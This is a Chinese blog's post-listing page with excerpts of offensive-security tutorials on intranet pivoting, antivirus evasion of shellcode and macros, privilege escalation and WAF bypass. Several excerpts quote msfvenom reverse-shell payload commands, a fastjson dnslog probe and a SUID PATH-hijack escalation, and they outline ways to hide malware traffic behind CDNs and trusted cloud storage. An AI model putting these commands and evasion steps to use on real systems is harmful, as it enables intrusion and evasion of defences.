自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

xiaoheizi的博客

网络安全文章创作

  • 博客(108)
  • 收藏
  • 关注

原创 超强AI【ChatGPT】

1.在如下输入框写要求:使用python写,内容为:获取当前目录zym.txt文件中的域名拼接当前目录zd.txt文件中的路径组成url,进行访问,并将访问状态码为200的url保存在当前目录下的jg.txt文件中。——访问https://chat.openai.com/来到GPT登录完成,可以看到下图介绍说三个小时只能使用40次,而且10人共用账号不一定轮到你。输入框接着写:修改代码,将扫描结果实时保存到jd.txt,五秒没有响应则跳过,在使用线程池提高访问速度。3.点开插件栏——篡改猴——获取新脚本。

2024-04-08 10:22:43 792

原创 内网渗透-防火墙出入规则上线-正反向连接+隧道技术-SMB+防火墙控制

想要通过windows10正向连接拿下windows2008时,发现windows2008开启了防火墙对入站规则做了限制,无法正向连接。拿下win2008后,我们还想要让win2012也上线cs,但是因为win2008限制了入站规则,所以无法再使用反向连接上线。前提:已经使用攻击机通过漏洞拿下了windows7主机,又通过windows7正向连接拿下了windows10。开启防火墙:netsh advfirewall set allprofiles state on。2.生成后门,使用此监听器。

2023-11-10 09:18:57 286

原创 内网渗透-代理Socks协议+路由不出网+后渗透通讯+CS-MSF控制上线

思路:在win2008(192.168.11.136)执行正向连接的木马程序,然后让win10(192.168.11.129)去主动连接win2008(192.168.11.136),连接成功后,因为win10是已经被我们控制了的,所以win2008也就被控制了。1.拿下一台主机权限后,右键——代理转发——socks server——开始,建立节点。6.双击启动浏览器,成功使用我们的外网主机访问到了目标内网,实现了网络通讯。下载:https://www.17uoo.com/game/4226/

2023-11-07 07:45:17 616

原创 内网渗透-域防火墙+入站出站规则+组策略对象同步+不出网隧道上线

5.限制协议:在来到出站规则——右键 新建规则 ——端口——选择 TCP和所有端口——阻止连接——选择 域——名字:TCP协议控制。2.因为使用的是reverse监听器方式,所以是出站,使用的是9527端口。如果目标主机的出站规则中TCP协议被封杀,入站规则没有封杀,有互联网网络。3.fhq处右键——编辑——来到 高级安全 windows 防火墙——右键 属性。1.查看一台域内主机的防火墙状态,域和专用网络是开启状态,公用网络关闭状态。4.我们配置为:域——启用 专用和公用——关闭。

2023-11-02 10:41:46 955

原创 内网渗透-域信息收集

net time/domain 从域控查询时间,若当前用户是域用户会从域控返回当前时间,亦用来判 断主域,主域一般用做时间服务器。使用域用户安装程序时,需要输入域控管理员的账号密码才能安装。3.还可以执行:net group "domain controllers" /domain #查看域控。net group "domain computers" /domain 查看加入域的所有计算机名。net group "domain admins" /domain 查询域管理员用户组和域管用户。

2023-10-30 19:28:58 658 1

原创 免杀对抗-防溯源拉黑+防流量审计

配置cdn,让木马远程连接的地址是我们域名上配置的cdn节点,就算拉黑某个cdn节点的ip,其他的cdn节点ip也会顶替上来,还是能够正常通信。当设置木马远程连接的地址是本机真实ip时,对方可以使用流量监测工具看到网络外联,当其拉黑ip后我们便不能正常通信了。在做shellcode分离时,如果从一个不受信任的url加载shellcode,可能会被杀软检测拦截。使用阿里云的OSS存储,加载shellcode文件,那么url是阿里云的,是绿标网站,就会被杀软放行。将下图位置填写为设置cdn的域名。

2023-10-24 19:46:22 168

原创 免杀对抗-宏免杀

编译:csc.exe /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs。5..将原生态宏文件cs.doc和经过踩踏的宏文件cs_EvilClippy.doc上传到恶意文件评测平台。4.点击开发工具——新建 宏——任意 宏名——宏的位置(之前新建的word文档)——创建。5.跳转到如下,将cs生成的宏代码写入——点击保存——取消。3.自定义功能区——勾选 开发工具——点击确定。

2023-10-07 17:02:21 1250 3

原创 免杀对抗-反沙盒+反调试

为了逃避沙箱/安全人员的检测,恶意软件使用了各类识别沙箱/虚拟机的技术,用于判断自身程序是否运行在沙箱/虚拟机中。其中比较有效的方案是动态沙箱检测技术,即通过在沙箱中运行程序并观察程序行为来判断程序是否为恶意程序。3.将重新生成的受保护的exe程序再次使用ollydbg调试,可以看到已经不能正常调试了。4.将exe程序放到虚拟机中无法运行,证明代码成功检测出当前处在虚拟环境中。3.msf设置监听,在真机运行exe程序,msf成功上线。3.将exe程序上传到虚拟机,exe程序无法运行。

2023-10-07 16:59:53 875

原创 免杀对抗-DLL劫持免杀

项目名称右键——打开项目位置——将反编译的dll源码复制进去。根据文件中的教程,选中文件——右键属性——如下图修改——点击应用。使用python执行如下代码,调用dll文件。lib=CDLL('生成的dll文件路径')选中dll源码拖入项目,工具就会自动加载源码。根据教程——继续打开asm文件的属性进行配置。打开asm文件,将所有的jmp语句删除。链接器——调试——生成调试信息——否。——代码生成——运行库——多线程。将生成的dll文件改名位krpt。预编译头——不使用预编译头。

2023-10-04 10:06:06 1689 3

原创 免杀对抗-成品EXE免杀-反特征码-通用跳转

1.将工具和exe程序放到环境中,启动程序,点击制作测试文件---选择exe程序,点击ok后会在工具目录下生成一个virtest.vir文件。因为目标使用的是火绒,所以我们自己搭建一个火绒环境,使用VirTest工具检测出exe程序的什么地方被火绒杀了。所以需要再次修改特征码处:将保存了00区间修改的exe程序拖入ollydbg工具中,搜索定位特征码汇编地址后四位。22.开启火绒检测,只保存了00区间修改的半成品被杀了。9.定位到特征码处,向下滑动一下,然后选中复制,将特征码的汇编地址保存起来。

2023-10-04 10:00:29 1154 10

原创 免杀对抗-Nim语言免杀-加载工具+加载方式

shellcodeCallback.nim下载:https://github.com/5598ca98-f0c8-4594-befe-330b23c2b7c4。nimcrypto,在有nimcrypto.nimble文件的文件夹(一般在根目录)启动命令行,执行:nimble install。1.下载nimPNG,在有nimPNG.nimble文件的文件夹(一般在根目录)启动命令行,执行:nimble install。4.再次执行:./lsp.exe de 生成的图片.png shellcode文件 密码。

2023-09-28 16:43:19 514 1

原创 免杀对抗-内存加载-shellcode转换-UUID+MAC+IPV4

IP地址与MAC地址在计算机里都是以二进制表示的,IP地址是32位的,而MAC地址则是48位(6个字节)的。IPv4使用32位(4字节)地址。介绍:通用唯一识别码(UUID),是用于计算机体系中以识别信息数目的一个128位标识符,根据标准方法生成,不依赖中央机构的注册和分配,UUID具有唯一性。此shellcode转换uuid的方法还可以使用:C# Python2 Go 等语言的shellcode加载器实施免杀。2.使用32位的加载器执行,将uuid类型的shellcode放到如下加载器中。

2023-09-26 17:16:55 1271

原创 免杀对抗-无文件落地&分离拆分-文本提取+加载器分离+参数协议化+图片隐写

无文件落地&分离拆分其实就是内存免杀,内存免杀是将shellcode直接加载进内存,由于没有文件落地,因此可以绕过文件扫描策略的查杀。为了使内存免杀的效果更好,在申请内存时一般采用渐进式申请一块可读写内存,在运行时改为可执行,在执行的时候遵循分离免杀的思想。分离免杀包含对特征和行为的分离两个维度,把shellcode从放在程序转移到加载进内存,把整块的shellcode通过分块传输的方法上传然后再拼接,这些体现了基本的”分离“思想。3.因为实战的时候不需要加密,所以就代码中的加密代码剔除,减少特征。

2023-09-24 20:01:20 1146 2

原创 免杀对抗-java语言-shellcode免杀-源码修改+打包exe

命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f jar -o msf.jar。1.点击启动jd-gui,将生成的msf.jar拖入其中进行反编译,点击file—save all sources导出反编译后的内容。1.将exe4j打包的exe程序再使用inno工具和jdk环境打包合并到一起,将文件上传目标系统,成功绕过检测。命令:jar cvfm 名称.jar META-INF/MANIFEST.MF .

2023-09-21 18:11:04 906

原创 免杀对抗-C#+go语言-混淆+防反编译+分离

介绍:上传脚本到目标系统时,很容易就会被杀软将脚本反编译检测,所以将脚本使用ConfuserEx项目进行保护,防止杀软反编译检测。命令:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=监听。命令:go build -ldflags "-s -w -H=windowsgui" 5.go。1.打开工具,将生成的exe程序拖入工具,然后如下图操作。执行文件,上传到目标系统,被火绒杀死。正常上传到目标系统,成功绕过检测。上传到目标系统,执行程序,

2023-09-19 17:07:43 1315

原创 免杀对抗-PowerShell-混淆+分离

解码代码:$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))被火绒杀死了,这个火绒真的搞不懂,只经过base64编码的让过了,经过base64编码又混淆的反而被杀。1.将文件模式的powershell使用Windows PowerShell ISE 打开,将文件中变量进行base64编码.3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行。

2023-09-15 19:48:56 594

原创 免杀对抗-Python-混淆算法+反序列化-打包生成器-Pyinstall

1.生成或者python2.打开pycharm工具,创建一个py文件,将原生态执行代码复制进去shellcode3.将生成的shellcode放到执行代码中,运行代码,cs成功上线1.执行命令,生成shellcode命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.206.129 lport=4444 -f c2.msf设置监听3.将shellcode放到执行脚本中运行。

2023-09-13 17:10:57 1039 1

原创 免杀对抗-ShellCode上线+回调编译执行+混淆变异算法

shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。我们经常在CS里面生成指定编程语言的payload,而这个payload里面就是一段十六进制的机器码。2.将shellcode放到执行脚本中(使用的调用执行方式是:申请动态内存加载),利用C/C++语言编译成exe执行文件。因为shellcode的免杀手段多,损坏的可能性小,能自定义更多选择。3.将新的shellcode放到自写的执行脚本xor.cpp中,使用。

2023-09-10 17:19:59 2385 5

原创 权限提升-Linux提权-Rsync 未授权访问-Docker组挂载-sudo权限提升(CVE-2021-3156)-Polkit(CVE-2021-4034)

一个综合类探针:一个自动化提权:两个信息收集:两个漏洞探针:二进制文件提权查询:

2023-09-04 18:50:12 275

原创 权限提升-Linux提权-环境变量文件配合SUID提权

命令:cp /bin/bash /home/ps #将/bin/bash复制为 /home/ps 相当于现在的/home/ps是bash命令。export PATH=/home:$PATH #环境变量加入/home 执行ps相当于执行/home/ps。./shell #shell执行,system权限执行ps命令,相当于suid执行bash就是直接提权。#system权限执行ps命令。2.编译demo文件重命名为shell(给到了suid权限),赋予执行权限 执行后运行ps命令。

2023-09-04 18:47:23 196

原创 【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限

1、具体有哪些权限需要我们了解掌握的?后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等2、以上常见权限获取方法简要归类说明?后台权限:SQL注入数据库备份泄露,默认或弱口令等获取帐号密码进入网站权限:后台提升至网站权限,RCE或文件操作类、反序列化等漏洞直达Shell数据库权限:SQL注入数据库备份泄露,默认或弱口令等进入或网站权限获取后转入接口权限:SQL注入数据库备份泄露,源码泄漏,培植不当等或网站权限获取后转入。

2023-09-01 19:07:10 1927 3

原创 权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC

进程迁移注入提权就是将获取到权限低的进程注入至进程中权限高的中,这样就实现了权限提升,同时注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现。操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。原理:把我的进程注入到一个现有的system账号运行的进程中,这样我的进程也就具有了system账号的权限了。程序路径:Potato/source/Potato/Potato/bin/Release/Potato.exe。

2023-08-30 19:20:08 1156 1

原创 权限提升-PostgreSQL数据库提权+第三方应用提权

操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。查看或修改程序源代码,可以进行网站或应用的配置文件读取(接口配置信息,数据库配置信息等),还能收集服务器操作系统相关的信息,为后续系统提权做准备。后台或网站权限后的获取途径:后台(修改配置信息功能点),网站权限(查看的配置文件获取),具体可以操作的事情大家自己想想。后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等。数据库备份泄露,源码泄漏,培植不当等或网站权限获取后转入。

2023-08-30 10:40:15 579

原创 权限提升-数据库提权-MSF-UDF提权

在MySQL 5.1版本及以后的环境下,udf提权时需要将udf.dll导出到mysql安装目录\lib\plugin\目录下。不同的操作系统,不同的版本,提权时导出udf.dll存放的目录不一样。//创建函数绑定dll。查看或修改程序源代码,可以进行网站或应用的配置文件读取(接口配置信息,数据库配置信息等),还能收集服务器操作系统相关的信息,为后续系统提权做准备。2、当secure_file_priv 的值为 c:/ ,表示限制 mysqld 的导入|导出只能发生在c盘目录下,无法进行提权。

2023-08-28 20:10:15 625

原创 权限提升-手工-系统权限提升

操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。查看或修改程序源代码,可以进行网站或应用的配置文件读取(接口配置信息,数据库配置信息等),还能收集服务器操作系统相关的信息,为后续系统提权做准备。后台或网站权限后的获取途径:后台(修改配置信息功能点),网站权限(查看的配置文件获取),具体可以操作的事情大家自己想想。后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等。数据库备份泄露,源码泄漏,培植不当等或网站权限获取后转入。

2023-08-27 19:26:58 368

原创 权限提升-数据库权限到web权限+后台权限到web权限

7.获取了数据库权限想要知道网站管理员的账号密码可以查看 带有admin或者user关键字的表。如果无法解密可以自己根据加密方式添加一个账号密码,如果无法复现加密方式,还可以在源码中删除验证代码进行无验证登录。

2023-08-26 18:02:20 470

原创 代码审计-审计工具介绍-DAST+SAST+IAST项目

各类语言审计工具PHP:Seay RIPS CheckMarx Fortify VCG Kunlun-MNET:VCG Fortify CheckMarxJava:Fortify CheckMarx VCGPython:Bandit Fortify CheckMarxJS:Kunlun-M NodeJsScan Fortify CheckMarxGo:Gosec CheckMarx

2023-08-21 19:00:47 879

原创 代码审计-java项目-组件漏洞审计

2.下载悟空CRM9.0源码:https://github.com/72wukong/72crm-9.0-JAVA。配合dnslog测试是否成功执行命令——传递的json数据:{"@type":"java.net.Inet4Address","val":"dnslog地址"}4.搜索fastjson组件产生过的历史漏洞,找到对应版本的漏洞,查看漏洞利用信息。-追踪过滤或接收的数据函数,寻找触发此函数或代码的地方进行触发测试。审计项目漏洞原理->审计思路->完整源码->应用框架->验证并利用漏洞。

2023-08-16 19:57:46 532

原创 代码审计-Java项目审计-SQL注入漏洞

eval assert preg_replace call_user_func call_user_func_array等。extract() parse_str() import_request_variables() $$ 等。$_FILES,type="file",上传,move_uploaded_file()等。$_GET,$_POST,$_REQUEST,$_FILES,$_SERVER等。审计目标的程序名,版本,当前环境(系统,中间件,脚本语言等信息),各种插件等。

2023-08-16 08:35:14 220

原创 代码审计-ASP.NET项目-未授权访问漏洞

Inheritsmsdn解释:定义提供给页继承的代码隐藏类。 它可以是从 Page 类派生的任何类。 此特性与 CodeFile 特性一起使用,后者包含指向代码隐藏类的源文件的路径。 Inherits 特性在使用 C# 作为页面语言时区分大小写,而在使用 Visual Basic 作为页面语言时不区分大小写。

2023-08-13 16:38:51 1642

原创 代码审计-Thinkphp框架审计前置知识点

使用thinkphp框架的源码审计思路:1.使用源码查看工具打开源码,全局搜索thinkphp确认源码是否使用thinkphp框架2.源码如果没有按照thinkphp框架的代码规则来写,则不会触发thinkphp框架的过滤规则。按照常规思路测试即可3.源码如果是按照thinkphp框架的代码规则来写的,则全局搜索THINK_VERSION确认框架版本信息,根据版本漏洞来测试。否则相当于在测试框架的0day。

2023-08-10 18:25:17 731

原创 代码审计-RCE命令执行漏洞审计

代码审计两种方法:功能点或关键字分析可能存在的漏洞 -抓包或搜索关键字找到代码出处及对应文件。 -追踪过滤或接收的数据函数,寻找触发此函数或代码的地方进行触发测试。

2023-08-08 18:42:38 287

原创 代码审计-审计方法和思路+文件对比技术

查看cms官网更新情况,可以看到漏洞版本后又更新了一个版本,就可以下载漏洞版本和更新版本进行对比。在cnvd等漏洞信息共享平台经常会发布一些某某cms爆出了某某漏洞,但是就是不公开漏洞具体信息。只爆出了产生漏洞的版本信息,并没有漏洞具体产生位置。访问地址,传递参数为1。我们就可以使用存在漏洞的版本和更新的版本进行对比,因为更新的目的就是解决之前的问题。审计目标的程序名,版本,当前环境(系统,中间件,脚本语言等信息),各种插件等。审计项目漏洞原理->审计思路->完整源码->应用框架->验证并利用漏洞。

2023-08-06 19:41:56 239

原创 WAF绕过-漏洞利用篇-sql注入+文件上传-过狗

硬件型WAF以一个独立的硬件设备的形态存在,支持以多种方式(如透明桥接模式、旁路模式、反向代理等)部署到网络中为后端的Web应用提供安全防护,是最为传统的WAF型态,在受访企业中部署占比为35.2%。国内的绿盟、安恒、启明星辰等老牌厂商旗下的WAF都属于此类。随着云计算技术的快速发展,使得基于云的WAF实现成为可能,在本次调查中占比甚至超过了传统的硬件WAF跃升为第一位,达到39.4%。就是来自网站内部的过滤,直接出现在网站代码中,比如说对输入的参数强制类转换啊,对输入的参数进行敏感词检测啊什么的。

2023-08-05 17:16:43 382 1

原创 WAF绕过-漏洞发现篇-漏洞扫描工具绕过WAF

3.来到网站:https://blog.csdn.net/qq_26230421/article/details/99052337 获取各大搜索引擎的蜘蛛UA头,我这里使用的是百度蜘蛛UA:Mozilla/5.0 (compatible;硬件型WAF以一个独立的硬件设备的形态存在,支持以多种方式(如透明桥接模式、旁路模式、反向代理等)部署到网络中为后端的Web应用提供安全防护,是最为传统的WAF型态,在受访企业中部署占比为35.2%。这种类型的WAF采用纯软件的方式实现,特点是安装简单,容易使用,成本低。

2023-08-04 18:35:27 741

原创 WAF绕过-工具特征-菜刀+冰蝎+哥斯拉

硬件型WAF以一个独立的硬件设备的形态存在,支持以多种方式(如透明桥接模式、旁路模式、反向代理等)部署到网络中为后端的Web应用提供安全防护,是最为传统的WAF型态,在受访企业中部署占比为35.2%。国内的绿盟、安恒、启明星辰等老牌厂商旗下的WAF都属于此类。随着云计算技术的快速发展,使得基于云的WAF实现成为可能,在本次调查中占比甚至超过了传统的硬件WAF跃升为第一位,达到39.4%。就是来自网站内部的过滤,直接出现在网站代码中,比如说对输入的参数强制类转换啊,对输入的参数进行敏感词检测啊什么的。

2023-08-02 20:00:29 338 1

原创 WAF绕过-权限控制篇-后门免杀

硬件型WAF以一个独立的硬件设备的形态存在,支持以多种方式(如透明桥接模式、旁路模式、反向代理等)部署到网络中为后端的Web应用提供安全防护,是最为传统的WAF型态,在受访企业中部署占比为35.2%。国内的绿盟、安恒、启明星辰等老牌厂商旗下的WAF都属于此类。随着云计算技术的快速发展,使得基于云的WAF实现成为可能,在本次调查中占比甚至超过了传统的硬件WAF跃升为第一位,达到39.4%。就是来自网站内部的过滤,直接出现在网站代码中,比如说对输入的参数强制类转换啊,对输入的参数进行敏感词检测啊什么的。

2023-08-01 20:00:55 277

原创 WAF绕过-信息收集篇

硬件型WAF以一个独立的硬件设备的形态存在,支持以多种方式(如透明桥接模式、旁路模式、反向代理等)部署到网络中为后端的Web应用提供安全防护,是最为传统的WAF型态,在受访企业中部署占比为35.2%。国内的绿盟、安恒、启明星辰等老牌厂商旗下的WAF都属于此类。随着云计算技术的快速发展,使得基于云的WAF实现成为可能,在本次调查中占比甚至超过了传统的硬件WAF跃升为第一位,达到39.4%。就是来自网站内部的过滤,直接出现在网站代码中,比如说对输入的参数强制类转换啊,对输入的参数进行敏感词检测啊什么的。

2023-07-31 19:37:36 254

原创 漏洞利用-PoC-in-GitHub+msf简单利用

下载:https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html。也因此软件厂商再也不能推迟发布针对已公布漏洞的补丁了,因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。1.打开文件搜索应用,填写漏洞库的路径,漏洞关键字。搜索漏洞关键字获取漏洞利用模块,输入:search struts2。打开文件,里面有漏洞编号和许多漏洞利用地址链接。

2023-07-30 20:43:38 429

原创 漏洞发现-BurpSuite插件-Fiora+Fastjson+Shiro

命令行下通过java启动程序的命令:java -jar Fiora-202100220-jar-with-dependencies.jar。安装:打开Burp——Extender——Extensions——Add——Select file——选择Fiora的jar包——打开。如果扫描的目标存在漏洞,在窗口下面的Request窗口会展示使用的payload,如果没有漏洞,则会展示原始的请求与响应。所以直接搜索关键字:【log4j】。配置插件Proxy,如果不配置,默认端口是为空的,运行就会报错。

2023-07-29 14:37:31 1482 6

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除